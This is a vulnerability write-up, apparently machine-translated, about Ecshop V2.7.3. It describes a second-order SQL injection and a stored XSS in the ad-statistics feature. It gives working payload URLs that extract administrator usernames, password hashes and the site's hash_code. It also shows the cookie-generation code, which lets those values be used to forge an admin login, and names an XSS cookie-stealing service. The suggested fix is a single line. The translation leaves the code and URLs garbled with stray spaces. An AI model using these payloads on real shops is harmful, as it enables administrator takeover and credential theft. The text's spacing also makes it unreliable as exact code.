Ecshop Latest Version SQL injection + storage XSS = arbitrary Administrator Login

A functional point of SQL injection and storage XSS contains a variety of techniques. I think I am an artist ~~ Ecshop V2.7.3 just now ~ 1. the vulnerability exists in the out-of-site ad statistics function (corresponding to the report statistics in the management background-> JS serving outside the site), that is,/affiche. on the php page, the from parameter (website source referer) is stored in the database table ecs_adsense, and the "put JS out of site" in the background is read, not filtered, and entered the SQL statement, this causes secondary injection.

/Affiche. php row 119 $ SQL = "INSERT ". $ ecs-> table ('adsense '). "(from_ad, referer, clicks) VALUES ('-1 ','". $ site_name. "', '1')"; // $ site_name is $ _ GET ['from'] Saved in/admin/adsense. php 47-49 line/* Get the total number of orders generated by the current advertisement */$ sql2 = 'select COUNT (order_id) from '. $ ecs-> table ('order _ info '). "WHERE from_ad = '$ rows [ad_id]' AND referer = '$ rows [referer]'"; // you can see it, without addslashes again, $ rows ['order _ num'] = $ db-> getOne ($ sql2) is injected );

 

2. At the same time, XSS is stored because the field referer is not filtered during output. 3. You can log on to the background by storing the XSS and getting the cookie, but how can I do this easily? Two SQL injections are used to obtain the hash_code in ecs_shop_config and the username + password of the Administrator. Isn't it better to generate a COOKIE by yourself? /Admin/privilege. php 136-141

if (isset($_POST['remember']))        {            $time = gmtime() + 3600 * 24 * 365;            setcookie('ECSCP[admin_id]',   $row['user_id'],                            $time);            setcookie('ECSCP[admin_pass]', md5($row['password'] . $_CFG['hash_code']), $time);        }

Http: // localhost/test/ecshop/affiche. php? From = a.baidu.com '% 20and % 201 = 2% 20 union % 20 select % 20group_concat (user_id,' | ', user_name,' | ', password) % 20 from % 20ecs_admin_user % 20 order % 20by % 201% 20 desc % 23 & ad_id =-1 // inject administrator information http: // localhost/test/ecshop/affiche. php? From = a.baidu.com '% 20and % 201 = 2% 20 union % 20 select % 20% 20 value % 20 FROM % 20 'ecs _ shop_config' % 20 WHERE % 20 code % 20 = % 20 'hash _ Code' % 20 order % 20by % 201% 20 desc % 23 & ad_id =-1 // The injected hash_codehttp: // localhost/test/ecshop/affiche. php? From = a.baidu.com % 3 Cscript % 3 Ealert (1) % 3C/script % 3E & ad_id =-1 // XSS. Of course, I used xsser. me to get information on the page



Solution:

Addslashes, filtering during output